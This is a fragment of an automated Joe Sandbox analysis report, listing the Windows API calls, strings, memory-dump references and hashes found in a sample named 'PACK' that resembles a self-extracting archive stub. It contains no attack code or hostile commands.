                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E73BE
                                                                                                                                                • Part of subcall function 002E399D: __EH_prolog.LIBCMT ref: 002E39A2
                                                                                                                                              • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 002E7485
                                                                                                                                                • Part of subcall function 002E7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 002E7A24
                                                                                                                                                • Part of subcall function 002E7A15: GetLastError.KERNEL32 ref: 002E7A6A
                                                                                                                                                • Part of subcall function 002E7A15: CloseHandle.KERNEL32(?), ref: 002E7A79
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                              • API String ID: 3813983858-639343689
                                                                                                                                              • Opcode ID: b2dbfbff7878cd71848eba79c6b67fa3762d28421fd70195fab6fd1a6af0f4aa
                                                                                                                                              • Instruction ID: 62f55346e93b0c08cecc2c60b02f8d93757a99ea6e0d0a398144da40eb18188b
                                                                                                                                              • Opcode Fuzzy Hash: b2dbfbff7878cd71848eba79c6b67fa3762d28421fd70195fab6fd1a6af0f4aa
                                                                                                                                              • Instruction Fuzzy Hash: 4031EB71954289AAEF21EF65DC41BFE7B7DAF59340F808069F408A7192C7744D64CBB0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 002F9C15
                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 002F9C2A
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 002F9C3F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                              • String ID: ASKNEXTVOL
                                                                                                                                              • API String ID: 445417207-3402441367
                                                                                                                                              • Opcode ID: d9236920cda979abd509b055dae3c5c5883375528eff36739d7b5b369649366c
                                                                                                                                              • Instruction ID: 10f84ae861fe187b2c33bae9b27a922f15c794b338bdddaa7ff3fd3d79a97fd0
                                                                                                                                              • Opcode Fuzzy Hash: d9236920cda979abd509b055dae3c5c5883375528eff36739d7b5b369649366c
                                                                                                                                              • Instruction Fuzzy Hash: D611DA336641456FD6129F68DE48FB677ACEB4F340F440032F30196071C7A29AA28B25
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __fprintf_l_strncpy
                                                                                                                                              • String ID: $%s$@%s
                                                                                                                                              • API String ID: 1857242416-834177443
                                                                                                                                              • Opcode ID: a151be1ab1e98521d87a0743677d12e65491ae7684c1e2b9a2050534c6bd788a
                                                                                                                                              • Instruction ID: ab826f499c1377b205ff600c504fd6d4ae8835e9e999141b007d93e444b6420b
                                                                                                                                              • Opcode Fuzzy Hash: a151be1ab1e98521d87a0743677d12e65491ae7684c1e2b9a2050534c6bd788a
                                                                                                                                              • Instruction Fuzzy Hash: 3621AE724A038DAEDF21DEA5CC01FEE3BA8AB05700F940022FA1496192E371D6668B60
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 002FA0FE
                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 002FA116
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 002FA144
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                              • String ID: GETPASSWORD1
                                                                                                                                              • API String ID: 445417207-3292211884
                                                                                                                                              • Opcode ID: df4d951be5bee64a7910a35495b4ed3687c5e7129f2f85b7bfe88249627187d1
                                                                                                                                              • Instruction ID: df032a2a916bd560fd3f3bfeac022033220c67a4be7f4b469e5b7b76d6208961
                                                                                                                                              • Opcode Fuzzy Hash: df4d951be5bee64a7910a35495b4ed3687c5e7129f2f85b7bfe88249627187d1
                                                                                                                                              • Instruction Fuzzy Hash: 6411087296021D76DB219E689D49FFBB77CEB0E780F014035FB4DB2080C6A5996186A2
                                                                                                                                              APIs
                                                                                                                                              • _swprintf.LIBCMT ref: 002EB1DE
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 002EB1FC
                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 002EB20C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                              • String ID: %c:\
                                                                                                                                              • API String ID: 525462905-3142399695
                                                                                                                                              • Opcode ID: 7b43157a5c9d16ec8a31983706ff825aa7f8a0ed55ffb48d8f24fd2bc34faf17
                                                                                                                                              • Instruction ID: 6450f0ffce13d9d33cece76b79a95299f9486d9656fc94dd14897b6de4895259
                                                                                                                                              • Opcode Fuzzy Hash: 7b43157a5c9d16ec8a31983706ff825aa7f8a0ed55ffb48d8f24fd2bc34faf17
                                                                                                                                              • Instruction Fuzzy Hash: 6401F96356035365DA226F769C46D6FB7ACDE55770BD04406FD44C7082FB70D860C2B1
                                                                                                                                              APIs
                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,002EA865,00000008,00000000,?,?,002EC802,?,00000000,?,00000001,?), ref: 002F035F
                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,002EA865,00000008,00000000,?,?,002EC802,?,00000000), ref: 002F0369
                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,002EA865,00000008,00000000,?,?,002EC802,?,00000000), ref: 002F0379
                                                                                                                                              Strings
                                                                                                                                              • Thread pool initialization failed., xrefs: 002F0391
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                                                              • Opcode ID: 188d7142a876d1ab262bc53bff50e5bf38c80b1bd341886afa06c46f40c85afb
                                                                                                                                              • Instruction ID: 28b87ab43f2cb81f8aa561fcbf5e601bf8cbde1ee1f9020f54006cfadd8a8012
                                                                                                                                              • Opcode Fuzzy Hash: 188d7142a876d1ab262bc53bff50e5bf38c80b1bd341886afa06c46f40c85afb
                                                                                                                                              • Instruction Fuzzy Hash: 191173B15507099FD3215F669CC8AEBFBECEB59394F10482EF2DA82201D67119A0CB50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                              • API String ID: 0-56093855
                                                                                                                                              • Opcode ID: 61415c8b4ddf5a76d51782e08e3e5969877ea8ef7f5a9efe133fe35e7ae2fe34
                                                                                                                                              • Instruction ID: 1957d3236a5cab224b8675ac4a886dfe5171effb7d1bcaed84c8f9688005310a
                                                                                                                                              • Opcode Fuzzy Hash: 61415c8b4ddf5a76d51782e08e3e5969877ea8ef7f5a9efe133fe35e7ae2fe34
                                                                                                                                              • Instruction Fuzzy Hash: E201797252820DAFD7129F15EE40A77F7EDF74A7D1F200439F641A2230D6A19C25D751
                                                                                                                                              APIs
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 002FC8A7
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002FC8E3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                              • String ID: sfxcmd$sfxpar
                                                                                                                                              • API String ID: 1431749950-3493335439
                                                                                                                                              • Opcode ID: f99fb1da285f8effcd908b2ee4dce7ed26d480d36c7e217630150792a152ab2b
                                                                                                                                              • Instruction ID: f02195e0861ecb67a0804de00a994472310d1642755981fec01c05753c5fa755
                                                                                                                                              • Opcode Fuzzy Hash: f99fb1da285f8effcd908b2ee4dce7ed26d480d36c7e217630150792a152ab2b
                                                                                                                                              • Instruction Fuzzy Hash: 86F0E272821229AAC7226FC19C09AFAB76C9F09791B004076FE4896102DA608860DBA0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                              • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                                                                                                                              • Instruction ID: f81bea25d5339be222d26706f776c923dc6b44c47255499e4db7608b423d562d
                                                                                                                                              • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                                                                                                                              • Instruction Fuzzy Hash: 58A16631A063869FDB23DF18C8A17BEBBA5EF15350F29416EE5C49B2C2CB348941C755
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,002E7F2C,?,?,?), ref: 002EA03C
                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,002E7F2C,?,?), ref: 002EA080
                                                                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,002E7F2C,?,?,?,?,?,?,?,?), ref: 002EA101
                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,002E7F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 002EA108
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2287278272-0
                                                                                                                                              • Opcode ID: 1ad53081e4b17e8f68cf793b49a0eaf7e5010e4f4f0832ddd9bf1b4368c8c173
                                                                                                                                              • Instruction ID: fb752ce4ad8b8e588e01a7972ed17745410532b1fb2fb76954f2c7ecac3cfaea
                                                                                                                                              • Opcode Fuzzy Hash: 1ad53081e4b17e8f68cf793b49a0eaf7e5010e4f4f0832ddd9bf1b4368c8c173
                                                                                                                                              • Instruction Fuzzy Hash: 2941F1302983C29AE731DF25DC41BEFBBE8AB89300F44091DB5D4D7181C664EA68DB63
                                                                                                                                              APIs
                                                                                                                                              • LoadBitmapW.USER32(00000065), ref: 002FA508
                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 002FA529
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 002FA551
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 002FA570
                                                                                                                                                • Part of subcall function 002F963A: FindResourceW.KERNEL32(00000066,PNG,?,?,002FA54A,00000066), ref: 002F964B
                                                                                                                                                • Part of subcall function 002F963A: SizeofResource.KERNEL32(00000000,75845780,?,?,002FA54A,00000066), ref: 002F9663
                                                                                                                                                • Part of subcall function 002F963A: LoadResource.KERNEL32(00000000,?,?,002FA54A,00000066), ref: 002F9676
                                                                                                                                                • Part of subcall function 002F963A: LockResource.KERNEL32(00000000,?,?,002FA54A,00000066), ref: 002F9681
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 142272564-0
                                                                                                                                              • Opcode ID: e2e8132280036d8f6b9cffbd4e7fbe9119d9edd51684f5b017e462b0adb12da6
                                                                                                                                              • Instruction ID: d26755730f961b0696ebc620a91398d42a1ab95940abbfb9aad39a7bd61b8c5c
                                                                                                                                              • Opcode Fuzzy Hash: e2e8132280036d8f6b9cffbd4e7fbe9119d9edd51684f5b017e462b0adb12da6
                                                                                                                                              • Instruction Fuzzy Hash: 0601F73295011D2BC71237684C46FBFF76E9B86BD1F880030BB04A7291DE118C2646A1
                                                                                                                                              APIs
                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00301AA0
                                                                                                                                                • Part of subcall function 003020D8: ___AdjustPointer.LIBCMT ref: 00302122
                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00301AB7
                                                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00301AC9
                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00301AED
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2633735394-0
                                                                                                                                              • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                                                              • Instruction ID: 96a8c2ea457f5089ea2e6a43aa155c34d68e41b25ef9f0721e860749778760cd
                                                                                                                                              • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                                                              • Instruction Fuzzy Hash: 49012532101108BBCF129F95CC11EEB7BBAFF88754F058124FE1866161D332E8A1EBA0
                                                                                                                                              APIs
                                                                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 003015E6
                                                                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 003015EB
                                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 003015F0
                                                                                                                                                • Part of subcall function 0030268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0030269F
                                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00301605
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1761009282-0
                                                                                                                                              • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                              • Instruction ID: f25adafe0e444e46e486d248f909fcb9d9aa2a0e9daa0715921a5270f85c3eee
                                                                                                                                              • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                              • Instruction Fuzzy Hash: EFC0022800364950DC133AB5273A6AB530409A27C9B9615C5FD411E4D35A47481B1632
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002F960F: GetDC.USER32(00000000), ref: 002F9613
                                                                                                                                                • Part of subcall function 002F960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 002F961E
                                                                                                                                                • Part of subcall function 002F960F: ReleaseDC.USER32(00000000,00000000), ref: 002F9629
                                                                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 002F978E
                                                                                                                                                • Part of subcall function 002F9954: GetDC.USER32(00000000), ref: 002F995D
                                                                                                                                                • Part of subcall function 002F9954: GetObjectW.GDI32(?,00000018,?), ref: 002F998C
                                                                                                                                                • Part of subcall function 002F9954: ReleaseDC.USER32(00000000,?), ref: 002F9A20
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
